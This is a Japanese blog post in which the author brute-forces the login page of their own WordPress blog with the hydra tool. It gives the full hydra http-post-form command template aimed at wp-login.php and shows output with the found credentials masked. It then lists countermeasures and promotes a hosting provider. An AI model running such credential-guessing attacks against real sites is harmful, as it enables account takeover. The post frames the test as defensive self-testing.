【悪用厳禁】自分のWordPressブログにブルートフォースアタックをしてみた

スポンサーリンク
Pocket
LINEで送る

自分のブログのセキュリティがしっかりしてるか気になったのでブルートフォースアタックを試した結果、やっぱりXSERVERって最高でした。

攻撃をするブログは僕、運営するブログ「プログラマーは眠らない」です。

CMSには人気のWordPressをしようしていて、サーバーはXserverを使っています。

 

 

ブルートフォースアタックとは

さて、今回はWordPressのログイン画面に対してブルートフォースアタックをします。

ブルートフォースアタックとは総当たり攻撃とも言って、辞書ファイルを使ってひたすらいろんなパターンのID/PASSの組み合わせを試しログインするというものです。

よく使われるIDやパスワードを使っている場合、何の対策もしていなければ簡単にログイン出来てしまいますね。

イメージ画像

※ログインのオラオララッシュです。

123987959_624

 

ブルートフォースアタックに使うツール

今回はツールを使用します。

使うツールは「hydra」

よく使うID/PASSは使っていないので自分のIDとPASSWORDを含んだ辞書ファイルを用意し使用します。

githubにソースがあります↓

https://github.com/vanhauser-thc/thc-hydra

 

では、クラッキングスタート。

b43ed8d1

hydra -L ID辞書ファイルのパス  -P passwordの辞書ファイルのパス {ドメインor IP} http-post-form “/wp-login.php:{ログインのname}=^USER^&{passwordのname}=^PASS^:エラーページに表示される文字”

 

一発目!

Xserverはブルートフォース対策していたみたいで、ログインできなくなっちゃいました。

サーバーパネルからログイン試行回数制限をOFFにして再度トライ!

fireshot-capture-048-wordpress%e7%ae%a1%e7%90%86%e7%94%bb%e9%9d%a2%e3%81%b8%e3%81%ae%e3%83%ad%e3%82%b0%e3%82%a4%e3%83%b3%e5%87%a6%e7%90%86%e3%81%8c%e6%8b%92%e5%90%a6%e3%81%95%e3%82%8c%e3%81%be

スポンサーリンク

2発目

Hydra (http://www.thc.org/thc-hydra) starting at 2016-**-** *******
[DATA] max 16 tasks per 1 server, overall 64 tasks, 35 login tries (l:5/p:7), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: notsleeeping.com login: **** password: ****
[80][http-post-form] host: notsleeeping.com login: **** password: ****
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-**-** **:**:**

ログインのIDとパスワードが割れました!!!!

35回ログインを試して見つかったみたいです。

かかった時間は5秒ほど。辞書ファイルに自分のIDとパスワードを含めているのでログインできるのは当たり前ですが、こんな短時間でできました。

これだとよくあるID/PASSだとあっという間に割れちゃいますね。

 

WordPressのブルートフォース攻撃の対策

ログインのURLを変更する

WordPressのログインURLを変更してしまえば、攻撃者は攻撃場所が分からないので攻撃されなくなります。

 

プラグインで対策

http://www.jp-secure.com/cont/products/siteguard_wp_plugin/index.html

設定が苦手な人はこれを使いましょう。

プラグインなのでボタンぽちぽちで対策できます。

 

IDやパスワードをよく使われているものにしない

WordPressのID・PASSによく使われるものをしないことが対策となります。

よく使われるものは「admin」そのままや「admin」が含まれたもの。

これが割りといるのですぐに変更しましょう。

 

XSERVER(エックスサーバー)を使う

今回の攻撃の通りXserverのサーバーはデフォルトでブルートフォース対策がされていました。

プラグインや他の細かい設定を自分でしたくないという方は最初から対策されているXSERVERを使うことをおすすめします。

エックスサーバー

 

まとめ

今回はセキュリティ対策としてこの記事を書きました。

この記事で使用したhydraは、完全に自分のみ利用しているWebアプリにのみ使用してください。

決してSNSや他人のブログに使わないでください。捕まります。

 

そして、僕のブログにも攻撃はしないでください。発見したら警察に通報します笑